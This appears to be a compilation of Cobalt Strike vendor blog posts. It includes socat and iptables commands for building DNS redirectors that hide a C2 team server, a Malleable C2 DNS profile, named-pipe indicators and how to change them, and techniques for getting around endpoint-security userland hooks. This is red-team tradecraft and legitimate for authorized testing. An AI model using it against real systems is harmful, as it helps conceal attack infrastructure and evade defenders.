SSL certificate verification failure

UPDATE: This has now been fixed. I’ve amended this post to reflect that.

If you ran the Cobalt Strike update program today, you may have seen an error message about the failed SSL certificate verification for www.cobaltstrike.com:

The update program pins the certificate for this server. When the certificate does not match what the update expects, the update program gives a warning. This is by design and is so that you can be confident that you’re getting the update from HelpSystems.

The change that caused the error has been reverted and the issue has been addressed. No further action is required on your part, and updates should now be working again.

We’d like to offer our sincere apologies for any inconvenience that this issue caused, and thank you for your patience while the issue was resolved.

Simple DNS Redirectors for Cobalt Strike

This post, from Ernesto Alvarez Capandeguy of Core Security’s CoreLabs Research Team, describes techniques used for creating UDP redirectors for protecting Cobalt Strike team servers. This is one of the recommended mechanisms for hiding Cobalt Strike team servers and involves adding different points which a Beacon can contact for instructions when using the HTTP channel.

Unlike HTTP Beacons, DNS Beacons do not contact the team server directly, but use the DNS infrastructure for carrying messages. In theory, the team server should be referenced in the DNS records so that all queries for the Command and Control (C2) domain are delivered properly. This would mean exposing the team server to the Internet, which is not desirable.

Just as HTTP redirectors can be used to hide the team server from outside scrutiny, a DNS redirector can be used for the same thing. In the case of DNS, redirectors are just one part of the solution, as alternative domains are also necessary in case the original domain is taken down. We will not cover these aspects here, as we’ll be concentrating on the redirection part.

Redirecting TCP traffic is straightforward. There is a very delimited set of data that clearly defines what constitutes a network connection (or flow). The state is explicit and can be easily determined from the packet stream. There are several generic proxies (e.g. SOCAT) that can simply proxy TCP connections on the user space. Options for secure proxying of TCP connections are also available (stunnel and SSH port forwarding are two well-known examples).

The situation is radically different for UDP. This is due to a few factors:

  • UDP is packet oriented, while TCP is byte/connection oriented.
  • UDP is stateless and keeping track of UDP “connections” requires second guessing the “connection” state.
  • UDP is handled very differently from TCP in userland.

In a TCP proxy operation, a connection is clearly defined. This connection can transmit EOF messages, so the proxy would always be aware of the state of the connection and would unambiguously know when it should release the connection resources.

UDP is more challenging, since without a way of directly sensing the DNS transaction state, SOCAT cannot know when to release the connection resources.

Simple Redirector Construction

The obvious solution for building a DNS redirector would be to use a DNS server. There are several choices for these, with differing features. We won’t touch on these options in this article, but will instead focus on simple redirectors that can be installed on minimal Linux systems and have a very small footprint.

Our redirectors will be based on the concept of diverting a UDP flow from the redirector’s local port to the team server in a way that the team server has to send the response back to the redirector, which will relay it to the Beacon.

There are two ways of achieving this goal: piping ports together and NAT.

Port Piping

We are all familiar with the concept of piping from a network port. Anyone can do it using netcat or an equivalent tool. Anyone with experience with any of these tools will also know that redirecting UDP traffic is sometimes problematic. A DNS redirector also has these problems, but they can be kept bounded.

For these tests, we are going to use SOCAT, a UNIX tool used to connect multiple types of inputs and outputs together. This tool can do the same thing as netcat but is more versatile.

Naive SOCAT Redirector

Before we jump into the solution, we should try to see the problems. Let’s attempt a naive approach to a DNS channel redirector. We can execute a straight SOCAT, and launch a Beacon pointed to our redirector, which will be executing the following:

# socat udp4-listen:53 udp4:teamserver.example.net:53

The initial installation works, and we see the ghost Beacon in the team server. However, any further communication fails. Monitoring the DNS traffic, we see the following:

# tcpdump -l -n -s 5655 -i eth0  udp port 53
 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 5655 bytes
 
05:40:26.453966 IP 173.194.91.156.62931 > redirector.example.net.53: 55757% A? 7242b4ba.cobalt-domain.example.net. (51)
05:40:26.454317 IP redirector.example.net.56494 > teamserver.example.net.53: 55757% A? 7242b4ba.cobalt-domain.example.net. (51)
05:40:26.454593 IP teamserver.example.net.53 > redirector.example.net.56494: 55757- 1/0/0 A 0.0.0.0 (100)
05:40:26.454687 IP redirector.example.net.53 > 173.194.91.156.62931: 55757- 1/0/0 A 0.0.0.0 (100)
05:41:26.689753 IP 172.253.219.11.49854 > redirector.example.net.53: 56196% A? 7242b4ba.cobalt-domain.example.net. (51)
05:42:27.217514 IP 172.253.219.11.61868 > redirector.example.net.53: 28170% A? 7242b4ba.cobalt-domain.example.net. (51)
05:43:27.532055 IP 173.194.91.156.49467 > redirector.example.net.53: 59203% A? 7242b4ba.cobalt-domain.example.net. (51)
05:44:27.653780 IP 173.194.91.77.59444 > redirector.example.net.53: 14169% A? 7242b4ba.cobalt-domain.example.net. (51)
05:45:27.770012 IP 173.194.91.141.62374 > redirector.example.net.53: 52473% A? 7242b4ba.cobalt-domain.example.net. (51)
05:46:28.051530 IP 172.253.219.7.39179 > redirector.example.net.53: 26440% A? 7242b4ba.cobalt-domain.example.net. (51)
05:47:28.190316 IP 173.194.91.74.45768 > redirector.example.net.53: 41092% A? 7242b4ba.cobalt-domain.example.net. (51)

Well, the Beacon checked in fine, but after the first DNS request the pipeline stalls. This is because the UDP protocol is stateless. SOCAT never got the idea that the first transaction was over and is still waiting for data from the same source port, ignoring all the others.

This can easily be solved by telling SOCAT to fork for every packet it sees. Below we show our second attempt at doing a SOCAT redirector:

# socat udp4-listen:53,fork udp4:teamserver.example.net:53
 
# tcpdump -l -n -s 5655 -i eth0  udp port 53
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 5655 bytes
05:53:45.783953 IP 173.194.91.129.48083 > redirector.example.net.53: 3962% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:53:45.784730 IP redirector.example.net.34472 > teamserver.example.net.53: 3962% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:53:45.784860 IP teamserver.example.net.53 > redirector.example.net.34472: 3962- 1/0/0 A 0.0.0.0 (100)
05:53:45.784954 IP redirector.example.net.53 > 173.194.91.129.48083: 3962- 1/0/0 A 0.0.0.0 (100)
05:54:00.847401 IP 173.194.91.83.48991 > redirector.example.net.53: 57475% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:00.848289 IP redirector.example.net.46902 > teamserver.example.net.53: 57475% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:00.848436 IP teamserver.example.net.53 > redirector.example.net.46902: 57475- 1/0/0 A 0.0.0.0 (100)
05:54:00.848541 IP redirector.example.net.53 > 173.194.91.83.48991: 57475- 1/0/0 A 0.0.0.0 (100)
05:54:15.917608 IP 173.194.91.156.35560 > redirector.example.net.53: 29854% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:15.918490 IP redirector.example.net.55342 > teamserver.example.net.53: 29854% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
05:54:15.918615 IP teamserver.example.net.53 > redirector.example.net.55342: 29854- 1/0/0 A 0.0.0.0 (100)
05:54:15.918719 IP redirector.example.net.53 > 173.194.91.156.35560: 29854- 1/0/0 A 0.0.0.0 (100)

Our Beacon is now alive and communicating well! SOCAT now waits for packets coming from new sources and forwards them to our team server. While everything appears to be normal, this is unfortunately not the case, as this redirector will not work for long. Let’s inspect the process table:

# ps 
  PID TTY          TIME CMD
5365 pts/0    00:00:00 sudo
5366 pts/0    00:00:00 bash
5864 pts/0    00:00:00 socat
5865 pts/0    00:00:00 socat
5866 pts/0    00:00:00 socat
5867 pts/0    00:00:00 socat
5868 pts/0    00:00:00 socat
5869 pts/0    00:00:00 socat
5870 pts/0    00:00:00 socat
5871 pts/0    00:00:00 socat
5883 pts/0    00:00:00 socat
5886 pts/0    00:00:00 socat
5888 pts/0    00:00:00 socat
5889 pts/0    00:00:00 socat
5890 pts/0    00:00:00 socat
5891 pts/0    00:00:00 socat
5903 pts/0    00:00:00 socat
5904 pts/0    00:00:00 socat
5908 pts/0    00:00:00 socat
5910 pts/0    00:00:00 socat
5911 pts/0    00:00:00 socat
5912 pts/0    00:00:00 socat
5913 pts/0    00:00:00 socat
5914 pts/0    00:00:00 socat
5923 pts/0    00:00:00 ps

This does not look good. SOCAT processes are piling up. Let’s stress the redirector a bit by requesting a few screenshots and then check the process table:

# ps | grep socat | wc -l
3489

If we weren’t root, we would have run out of process slots long ago. Even the superuser will eventually have problems with this redirector:

socat udp4-listen:53,fork udp4:teamserver.example.net:53
2021/03/02 06:09:57 socat[5864] E fork(): Resource temporarily unavailable

As expected, we ran out of resources. Worse, we still have several thousand SOCAT processes waiting. The problem was caused because SOCAT does not notice that a transaction has run out, and still keeps its resources allocated.

Working UDP SOCAT Redirector

Now that we understand the problems involving UDP proxying, we can build a functional solution. The trick is telling SOCAT to drop the connections as soon as the transaction is complete. Telling SOCAT to apply a 5 second inactivity timeout should do the trick:

 # socat -T 5 udp4-listen:53,fork udp4:teamserver.example.net:53

In the example above, we told SOCAT that if no data is seen for five seconds, it should close the socket and assume that no further communication is needed.

While five seconds is a reasonable default timeout, we can attempt to optimize this value. To fine tune the timeout, we should understand the problem we’re facing. A DNS request is sent to our reflector, which is relayed to the team server. Once the team server answers, the transaction is over.

This limits our timeout to something we can control: the round-trip time between the redirector and the team server, including the time needed to process the request. A reasonable value would be twice the RTT between the hosts, to have some safety margin. Since our test hosts are in the same LAN, a timeout of one second should be more than enough for our example.

Below we show the process usage for five and one second timeouts:

The graph shows that the number of SOCAT processes rises as soon as there is activity, but the timeout causes the number of active processes to reach a plateau and stay at a certain value, depending on the activity and the timeout.

Working SOCAT UDP/TCP Redirector

We now have a working redirector. We can also use SOCAT for UDP to TCP translation. For every UDP packet received, we can fork and open a TCP connection, sending the DNS data via TCP. It is very important not to recycle connections, because UDP is packet oriented while TCP is not. We should never put more than one packet within a TCP connection, because two packets might be joined or split. In theory, SOCAT might decide to split a DNS request in two UDP packets, but this does not happen in practice. You should know that there is always that risk when doing UDP to TCP translations.

We tell SOCAT to take traffic from port 53, and for each packet, to open a connection to port 9191/tcp on the team server. The timeout is set to one second, which might be a bit too low, considering that TCP is involved:

# socat -T 1 udp4-listen:53,fork tcp4:teamserver.example.net:9191

Since we’re encapsulating our data within TCP, we need to run the following in the team server:

# socat -T 10 tcp4-listen:9191,fork udp4:127.0.0.1:53

Let’s now try generating some traffic and see what happens.

The dip in the middle represents a lapse in activity. The quick timeout allows for fast recovery. Overall, it’s not bad, but we also need to see how many open connections we have.

The numbers are somewhat high because TCP requires a wait period when a connection is closed from the client side. This is needed in case some control messages are lost and should not be removed for the protocol to operate properly. This is not a problem, though, because the number of resources allocated reach an equilibrium. A few RTT after the activity goes down, the resource usage drops as well.

Once we have the translation capability, we can take advantage of it. With DNS over TCP connections, we can take advantage of other proxying utilities, like stunnel or SSH’s port forwarding, and attempt to hide the team server from public scrutiny. The team server can be kept in an isolated network, without being exposed to the Internet.

NAT Based Redirectors

Another possible solution involves NAT. The concept behind a NAT redirector is to apply two NAT operations to incoming packets. The packet must be redirected to the team server, but at the same time, the packet must also be translated so that it appears to come from the redirector.

Failing to apply the second operation will cause the team server to answer the DNS query itself. The response will be ignored, as it will come from a different DNS server.

For our NAT redirector, we use Linux’s IPTABLES.

IPTABLES Based Redirector

IPTABLES is also well suited for use as a redirector. The Linux kernel’s NAT system automatically keeps track of connection state, even for UDP traffic. The detection is based on timers and inactivity, but the system is well developed and very stable.

The advantage of IPTABLES redirectors is that they’re lightning fast, incredibly efficient, and robust. Unlike SOCAT redirectors, iptables cannot convert from one protocol to another as IPTABLES works by packet mangling.

To create a working redirector, two things need to happen at the same time. Once a DNS query reaches the redirector, it must be redirected to the team server. This requires a DNAT operation.

However, if DNAT is used alone the packet will be diverted without changing the source address. As we already explained, this is not a good result, so we’ll also need to execute a SNAT operation.

The decision for doing the double NAT needs to be taken before any of the operations take place, as the DNAT change in the PREROUTING rule will erase important information present in the packet (namely whether this packet is addressed to the redirector or not).

To execute both operations simultaneously, we call the MARK target in the PREROUTING chain, and match the packet using every parameter of interest. Once the packet is marked, we can apply all operations both in the PREROUTING and POSTROUTING chains, completely changing the packet.

One final detail is that IP forwarding must be enabled in the redirector, since all these operations count as a forward, even if the packet is sent through the same interface it came in.

In the end, there are four commands that need to be called:

#enable IP forwarding
echo "1" > /proc/sys/net/ipv4/ip_forward

#Mark incoming DNS packets with the tag 0x400
iptables -t nat -A PREROUTING -m state --state NEW --protocol udp --destination my.ip.address 
--destination-port 53 -j MARK --set-mark 0x400

#For every marked packet, apply a DNAT and a SNAT (in this case, a MASQUERADE)
iptables -t nat -A PREROUTING -m mark --mark 0x400 --protocol udp 
-j DNAT --to-destination teamserver.example.net:53
iptables -t nat -A POSTROUTING -m mark --mark 0x400 -j MASQUERADE

Evaluating the capabilities listed in the proc filesystem, we see that we have 65,536 entries in the translation table (proc/sys/net/netfilter/nf_conntrack_max), and 16,384 buckets (/proc/sys/net/netfilter/nf_conntrack_buckets). This indicates that even at peak capacity, the lookups should be quick. These are default values and can be easily changed by writing a new number to the file, if necessary.

The system keeps track of the traffic passing through the redirector, so no action is needed for returning packets since they are translated back automatically.

To evaluate the performance of the redirector, we can measure the number of active NAT entries and how this number changes as the system is loaded. To measure this, we can read /proc/sys/net/netfilter/nf_conntrack_count.

Our experiment starts with a Beacon signaling at 15 second intervals. The Beacon is then made to signal continuously, followed by a high activity period. Once this activity period is over, the Beacon is reconfigured to its initial value of 15 seconds between polls.

In the test above we can see that the number of occupied slots depends on the network activity. With just one Beacon polling at 15 second intervals, the amount of conntrack slots is less than 10. If we switch to no delay, the value quickly grows to about 500, depending on availability throughput. When heavy activity is requested, the connection states steadily rise to 2500 and plateaus at 2700. Once activity ceases, connection tracks decrease until around 90 seconds, at which point they are all expired and the value stabilizes below 10.

IPTABLES redirectors perform quite well with very modest resources, even with default settings. This is not surprising, given the nature of the Linux kernel. Redirectors like this one can easily be deployed on the smallest computers or cloud instances. IPTABLES redirectors, once set up, are pretty much foolproof.

Summary

In this article, we saw three different implementations of DNS Beacon redirectors. Though these implementations have different advantages and disadvantages,  they are ultimately all very usable.

The IPTABLES based redirector is the quickest with the smallest footprint, being included by default in the kernel, and needing just four commands.

The SOCAT based redirectors are similar, the main difference being whether traffic is converted to TCP or not. UDP redirectors are simplest, but TCP redirectors have an advantage in the sense that TCP connections are easier to encapsulate, which is an advantage in special cases, like when the traffic must be tunneled via SSH.

Resource usage Speed Versatility Ease of Use Stability
SOCAT TCP 0 ++ + 0
SOCAT UDP + + + ++ +
IPTABLES ++ ++ 0 ++ ++

 

Raphael’s Transition

Friday was my last day at HelpSystems. I spent the day on the #Aggressor channel on Slack, put some final touches on a 12 month roadmap document, and worked with my colleagues to remove myself from a few systems I had originally designed. I had planned to get a blog post out yesterday, but the day ran right up to my dinner plans!

Cobalt Strike is in great shape. The product is no longer the efforts of one person. There’s a full research and development team behind it. Greg Darwin is the leader. You’ll see his announcements here and on the Cobalt Strike Technical Notes mailing list. Twitter announcements for Cobalt Strike will come from @CoreAdvisories as well.

You’ve seen the work of our R&D team. 4.3 was their release. I provided guidance, but they 100% carried it.

The team is filled with very senior software folks. All come from security backgrounds (one of our engineers was tech lead of HelpSystems’ server antivirus product). The forward mantra is to keep the product stable and to continue to give more flexibility into the product’s attack chain.

The above team was three folks one week ago. A fourth engineer joined this week. And, we’re recruiting our hacker-in-residence as well. The hacker-in-residence will pick up some aspects of my role: input on the overall product direction, providing subject matter expertise on offense topics, and interacting with and helping all of us learn from you.

You have a bigger ally now. HelpSystems’ business strategy in this space is simple. As red teaming succeeds as a practice, we’ll succeed as a business. Cobalt Strike is in good hands.

I want to thank you for the opportunity to work with you for the past decade. It was the greatest privilege of my career. For me, the biggest thrill in this work wasn’t related to the technology. It was watching your careers, seeing your successes, and feeling a small supporting role in it. Thanks for having me as part of it.

Cobalt Strike 4.3 – Command and CONTROL

Cobalt Strike 4.3 is now available. The bulk of the release involves updates to DNS processing but there are some other, smaller changes in there too.

DNS updates

We have added options to Malleable C2 to allow DNS traffic to be masked. A new dns-beacon block allows you to specify options to override the DNS subhost prefix used for different types of request. All existing options relating to DNS have also been moved inside this block. The affected options are: dns_idle, dns_max_txt, dns_sleep, dns_ttl, maxdns, dns_stager_prepend and dns_stager_subhost.

Something that you should be aware of is that the addition of the dns-beacon block means that in order for them to be processed, these existing options need to be defined inside the block. Values for these options outside of the dns-beacon block in existing profiles will be ignored.

dns-beacon {
    # Options moved into 'dns-beacon' group in 4.3:
    set dns_idle             "1.2.3.4";
    set dns_max_txt          "199";
    set dns_sleep            "1";
    set dns_ttl              "5";
    set maxdns               "200";
    set dns_stager_prepend   "doc-stg-prepend";
    set dns_stager_subhost   "doc-stg-sh.";
    
    # DNS subhost override options added in 4.3:
    set beacon               "doc.bc.";
    set get_A                "doc.1a.";
    set get_AAAA             "doc.4a.";
    set get_TXT              "doc.tx.";
    set put_metadata         "doc.md.";
    set put_output           "doc.po.";
    set ns_response          "zero";
}

Another change related to DNS is the addition of functionality to allow a DNS Beacon to egress using a specific DNS resolver, rather than the default DNS resolver for the target server. A new DNS Resolver field has been added to the DNS listener configuration dialog to facilitate this change.

Rounding out the DNS changes, a smaller change is the addition of a customization option related to how the server responds to NS record requests. We have noticed that some DNS resolvers do not allow the DNS Beacon to successfully egress to their team server due to unexpected NS record requests being injected into the communications. Prior to this release, the team server would drop the NS requests and if certain DNS resolvers fail to receive responses to those requests, DNS communications would fail. To get around this issue, we have added another option (ns_response) to the new dns-beacon block to allow the response to those requests to be customized.

Host rotation

We have made improvements to evasion in the DNS and HTTP/S Beacons by adding a host rotation strategy option. Prior to this release, a close examination of DNS and HTTP/S traffic would reveal a round robin pattern of host processing. A new host rotation strategy option in the listener configurations for the DNS and HTTP/S Beacons allows you to use different strategies for rotating through hosts. The options include the existing round robin rotation plus three new options – random, rotate on failure, and rotate after a set period of time.

Quality-of-life updates

Outside of the main DNS theme to the release, we have made a couple of a smaller, quality-of-life changes; the first of which is the addition of a PowerShell IEX option in Scripted Web Delivery. The new powershell IEX option outputs a shorter IEX command that can be pasted directly into a PowerShell console.

Another quality-of-life change is the option to prefix console messages with a timestamp. This option can be turned on or off via the console preferences dialog.

User agent handling

One final update to mention involves how requests from certain user agents are handled. The default behaviour of the team server prior to this release has been to block requests from user agents starting with “curl”, “lynx” or “wget” with a 404 response. We have received feedback that this causes problems for some users that want their server to be able to respond to requests from traffic that appears to be coming from certain user agents. To address this, we have added a block_useragents option to the http-config block within the Malleable C2 profile. This allows you to specify which user agents to respond to.

To see a full list of what’s new in Cobalt Strike 4.3, please check out the release notes. Licensed users can run the update program to get the latest version. To purchase Cobalt Strike or ask about evaluation options, please contact us for more information.

Learn Pipe Fitting for all of your Offense Projects

Named pipes are a method of inter-process communication in Windows. They’re used primarily for local processes to communicate with eachother. They can also facilitate communication between two processes on separate hosts. This traffic is encapsulated in the Microsoft SMB Protocol. If you ever hear someone refer to a named pipe transport as an SMB channel, this is why.

Cobalt Strike uses named pipes in several of its features. In this post, I’ll walk you through where Cobalt Strike uses named pipes, what the default pipename is, and how to change it. I’ll also share some tips to avoid named pipes in your Cobalt Strike attack chain too.

Where does Cobalt Strike use named pipes?

Cobalt Strike’s default Artifact Kit EXEs and DLLs use named pipes to launder shellcode in a way that defeats antivirus binary emulation circa 2014. It’s still the default. When you see \\.\pipe\MSSE-###-server that’s likely the default Cobalt Strike Artifact Kit binaries. You can change this via the Artifact Kit. Look at src-common/bypass-pipe.c in the Artifact Kit to see the implementation.

Cobalt Strike also uses named pipes for its payload staging in the jump psexec_psh module for lateral movement. This pipename is \\.\pipe\status_##. You can change the pipe via Malleable C2 (set pipename_stager).

Cobalt Strike uses named pipes in its SMB Beacon communication. The product has had this feature since 2013. It’s pretty cool. You can change the pipename via your profile and when you configure an SMB Beacon payload. I’m also aware of a few detections that target the content of the SMB Beacon feature too. The SMB Beacon uses a [length][data] pattern and these IOCs target predictable [length] values at the beginning of the traffic. The smb_frame_header Malleable C2 option pushes back on this. The default pipe is \\[target]\pipe\msagent_##.

Cobalt Strike uses named pipes for its SSH sessions to chain to a parent Beacon. The SSH client in Cobalt Strike is essentially an SMB Beacon as far as Cobalt Strike is concerned. You can change the pipename (as of 4.2) by setting ssh_pipename in your profile. The default name of this pipe (CS 4.2 and later) is \\.\pipe\postex_ssh_####.

Cobalt Strike uses named pipes for most of its post-exploitation jobs. We use named pipes for post-ex tools that inject into an explicit process (screenshot, keylog). Our fork&run tools largely use named pipes to communicate results back to Beacon too. F-Secure’s Detecting Cobalt Strike Default Modules via Named Pipe Analysis discusses this aspect of Cobalt Strike’s named pipes. We introduced the ability to change these pipenames in Cobalt Strike 4.2. Set post-ex -> pipename in your Malleable C2 profile. The default name for these pipes is \\.\pipe\postex_#### in Cobalt Strike 4.2 and later. Prior to 4.2, the default name was random-ish.

Pipe Fitting with Cobalt Strike

With the above, you’re now armed with knowledge of where Cobalt Strike uses named pipes. You’re also empowered to change their default names too. If you’re looking for a candidate pipename, use ls \\.\pipe from Beacon to quickly see a list of named pipes on a lived-in Windows system. This will give you plenty to choose from. Also, when you set your plausible pipe names, be aware that each # character is replaced with a random character (0-9a-f) as well.  And, one last tip: you can specify a comma-separated list of candidate pipe names in your ssh_pipename and post-ex -> pipename profile values. Cobalt Strike will pick from this list, at random, when one of these values is needed.

Simplify your Offense Plumbing

Cobalt Strike uses named pipes in several parts of its offense chain. These are largely optional though and you can avoid them with some care. For example, the default Artifact Kit uses named pipes; but this is not a requirement of the Artifact Kit. Our other Artifact Kit templates do not use named pipes. For lateral movement and peer-to-peer chaining of Beacons, the TCP Beacon is an option. To avoid named pipes from our SSH sessions, tunnel an external SSH client via a SOCKS proxy pivot. And, while a lot of our fork&run post-exploitation DLLs use named pipes for results, Beacon Object Files are another way to build and run post-exploitation tools on top of Beacon. The Beacon Object Files mechanism does not use named pipes.

Closing Thoughts

This post focused on named pipe names, but the concepts here apply to the rest of Cobalt Strike as well. In offense, knowing your IOCs and how to change or avoid them is key to success. Our goal with Cobalt Strike isn’t amazing and ever-changing default pipe names or IOCs. Our goal is flexibility. Our current and future work is to give you more control over your attack chain over time. To know today’s options, read Kits, Profiles, and Scripts… Oh my! This blog post summarizes ways to customize Cobalt Strike. Our late-2019 Red Team Operations with Cobalt Strike mixes these ideas into each lecture as well.

Pushing back on userland hooks with Cobalt Strike

When I think about defense in the current era, I think of it as a game of instrumentation and telemetry. A well-instrumented endpoint provides a defense team and an automated security solution with the potential to react to or have visibility into a lot of events on a system. I say a lot, because certainly some actions are not easy to see [or practical to work with] via today’s instrumentation methods.

A popular method to instrument Windows endpoints is userland hooking. The process for this instrumentation looks like this:

(a) load a security product DLL into the process space [on process start, before the process starts to do anything]

(b) from the product DLL: installs hooks into certain APIs of interest. There are a lot of different ways to hook, but one of the most common is to patch the first instructions in a function-of-interest to jump to the vendor’s code, do the analysis, execute the patched over instructions, and resume the function just after the patch.

This method of instrumentation is popular because it’s easy-ish to implement, well understood, and was best practice in security products for a very long time. It’s still common in a lot of security technologies today.

The downside of the above instrumentation method is that it’s also suscpetible to tamper and attack by an adversary. The adversary’s code that lives in a process has the same rights and ability to examine and change code as the security product that installed itself there.

The above possibility is the impetus for this blog post. I’d like to walk you through a few strategies to subvert instrumentation implemented as userland hooks with the Cobalt Strike product.

Which products use hooks and what do they hook?

Each of these techniques does benefit from awareness of the endpoint security products in play and how [also, if] they use userland hooks to have visibility.  Devisha Rochlani did a lot of work to survey different products and document their hooks. Read the Anti-virus Artifacts papers for more on this.

To do target-specific leg work, consult Matt Hand’s Adventures in Dynamic Evasion. Matt discusses how to identify hooks in a customer’s environment right now and use that information to programatically craft a tailored evasion strategy.

Avoid Hooks with Direct System Calls

One way to defeat userland hooks is to avoid them by making system calls directly from our code.

A direct syscall is made by populating registers with arguments and a syscall number that corresponds to an API exposed to userland by the operating system kernel. The system call is then invoked with the syscall instruction. NTDLL is largely thin wrappers around these kernel APIs and is a place some products insert their hooks. By making syscalls directly from our code, and not calling them via NTDLL (or an API that calls them via NTDLL), we avoid these hooks.

The value of this technique is that we deny a security product visibility into our actions via this means. The downside is we have to adapt our code to working with these APIs specifically.

If a security product isn’t using userland hooks this technique provides no evasion value. If we use system calls for uninteresting (e.g., not hooked) actions–this technique provides no evasion value.

Also, be aware that direct system calls (outside of specific contexts, like NTDLL) can be disabled process-by-process in Windows 10. This is the ProcessSystemCallDisablePolicy. If something can be disabled, I surmise it can also be monitored and used for detection purposes too. This leads to a familiar situation. A technique that provides evasion utility now can also provide detection opportunities later on. This is a trueism with most things offense. Always keep it in mind when deciding whether or not to use a technique like this.

With the above out of the way, what are some opportunities to use system calls from Cobalt Strike’s Beacon?

One option is to use system calls in your EXE and DLL artifacts that run Cobalt Strike’s Beacon. The blog post Implementing Syscalls in the Cobalt Strike Artifact Kit walks through how to do this for Cobalt Strike’s EXEs and DLLs. The post’s author shared that VirtualAlloc, VirtualProtect, and CreateThread are calls some products hook to identify malicious activity. I’d also go further and say that if your artifact spawns a process and injects a payload into it, direct syscalls are a way to hide this behavior from some security stacks.

Another option is to use system calls within some of your Beacon post-exploitation activities. While Beacon doesn’t use direct system calls with any of its built-ins, you can define your own built-ins with Beacon Object Files. Cornelis de Plaa from Outflank authored Direct Syscalls from Beacon Object Files to demonstrate how to use Jackson T.‘s Syswhispers 1 (Syswhispers 2 just came out!) from Beacon Object Files. As a proof-of-concept, Cornelis released a Beacon Object File to restore plaintext credential caching in LSASS via an in-memory patch.

Building on the above, Alfie Champion used Outflank’s foundation and re-implemented Cobalt Strike’s shinject and shspawn as Beacon Object Files that use direct system calls. This provides a way to do process injection from Cobalt Strike, but evade detections that rely on userland hooks. The only thing that’s missing is some way for scripts to intercept Cobalt Strike’s built-in fork&run actions and override the built-in behaviors with a BOF. Hmmmmm.

Refresh DLLs to Remove Function Hooks

Another way to defeat userland hooks is to find hooks implemented as code patches and restore the functions to their original uninstrumented state. One way to do this is to find hooked DLLs in memory, read the original DLL from disk, and use that content to restore the mapped DLL to its unhooked state. This is DLL refreshing.

The simplest case of DLL refreshing is to act on NTDLL. NTDLL is a good candidate, because its really easy to refresh. You don’t have to worry about relocations and alternate API sets. NTDLL is also a good candidate because it’s a target for security product hooks! The NTDLL functions are often the lowest-level API that other Windows APIs call from userland. A well-placed hook in NTDLL will grant visibility into all of the userland APIs that use it.

You can refresh NTDLL within a Cobalt Strike Beacon with a Beacon Object File. Riccardo Ancarani put together a proof-of-concept to do this. Compile the code and use inline-execute to run it.

If NTDLL is not enough, you can refresh all of the DLLs in your current process. This path has more peril though. The DLL refreshing implementation needs to account for relocations, apisets, and other stuff that makes the unhooked code on disk differ from the unhooked code in memory. Jeff Tang from Cylance’s Red Team undertook this daunting task in 2017 and released their Universal Unhooker (whitepaper).

I’ve put together a Beacon Object File implementation of Cylance’s Universal Unhooker. The script for this BOF adds an unhook alias to Beacon. Type unhook and Beacon will pass control to the unhooker code, let it do its thing, and then return control back to Beacon.

Both of these techniques are great options to clean your Beacon process space before you start into other offense activities.

While the above are Beacon Object Files and presume that your Beacon is already loaded, you may also find it’s worthwhile to implement DLL refreshing in your initial access artifact too. Like direct system calls, this is a way to defeat userland hooking visibility that could affect your agent loading or its initial communications.

Prevent Hooks via Windows Process Mitigations

So far, we’ve discussed ways to defeat hooks by either avoiding them or undoing them. It’s possible to prevent hooking altogether too.

I became interested in this approach, when I learned that Google Chrome takes many steps to prevent security products from loading into its process space. Google was tired of entertaining crash reports from poorly implemented endpoint security products and opted to fight back against this in their own code. I share Google’s concerns about allowing an endpoint security product to share space with my post-exploitation code. My reasons are different, but we’re very much aligned on this cause!

The above led me to experiment with the Windows 10 process mitigation policy, BinarySignaturePolicy. A process run with a BinarySignaturePolicy of MicrosoftSignedOnly will refuse to load any DLL not signed by Microsoft into that process space. This mitigation prevents some security products from loading their DLLs into the new process space.

I opted to use the above to implement blockdlls in Cobalt Strike 3.14. blockdlls is a session prepping command to run processes with this flag set. The idea of blockdlls is processes spawned by Beacon will be free to act with less scrutiny, in some situations.

There are caveats to blockdlls. The mitigation is a recent-ish Windows 10 addition. It doesn’t work on versions of Windows where this mitigation isn’t implemented. Duh! And, security vendors do have the option to get Microsoft to sign their DLLs via an attestation service offered by Microsoft. A few made this exact move after Cobalt Strike weaponized this mitigation in version 3.14.

For more information on this technique and its variations, read Adam Chester’s Protecting Your malware with blockdlls and ACG. It’s a great overview of the technique and also discusses variations of the same idea.

Like direct system calls, I see the use of process mitigations as an evasion that is also potentially its own tell. Be aware of this tradeoff. Also, like direct system calls, this is an option that has use both during post-exploitation and in an initial access artifact. Any initial access artifact that performs migration (again, Cobalt Strike’s service executables do this) could benefit from this approach in some security stacks too.

Closing Thoughts

And, there you have it. This blog posted presented a few different techniques to defeat userland hooks with Cobalt Strike. Better, each of these techniques delivers benefit at different places in Cobalt Strike’s engagement cycle.

Be aware that each of these methods is beneficial in very specific circumstances. None of the above will have impact against technologies that do not use userland hooks for instrumentation. Offense is always about trade-offs. Knowing the techniques available to you and knowing their trade-offs will help you assess your situation and decide the best way forward. This is key to good security testing engagements.

Agent Deployed: Core Impact and Cobalt Strike Interoperability

Core Impact 20.3 has shipped this week. With this release, we’re revealing patterns for interoperability between Core Impact and Cobalt Strike. In this post, I’ll walk you through these patterns and provide advice on how to get benefit using Cobalt Strike and Core Impact together.

A Red Team Operator’s Introduction to Core Impact

Prior to jumping into the patterns, I’d like to introduce you to Core Impact with my voice. Core Impact is a commercial penetration testing tool and exploit framework that has had continuous development since 1998.

Impact is a collection of remote, local, and client-side attacks for public vulnerabilities and other common offense actions. We implement [with special attention to QA] our own exploits as well. While we announce 2-3 product updates per year, we push new modules and module updates in between releases too.

Impact is also a collection of post-exploitation agents for Windows, Linux, other *NIX flavors (to include OS X), and Cisco IOS. While Windows has the most features and best support, our *NIX agents are robust and useful. The pivoting model and interface for these platforms is largely unified. The Impact agent is one of my favorite parts of the product.

Core Impact also has a graphical user interface to bring all of these things together. It’s quirky and does have a learning curve. But, once you grok the ideas behind it, the product clicks and it is thought out.

While Core Impact was long-marketed as a vulnerability verification tool [notice: I’m not mentioning the automation], it’s clear to me that the product was architected by hackers. This hacker side of Core Impact is what I’d like to show you in this video walk-through:

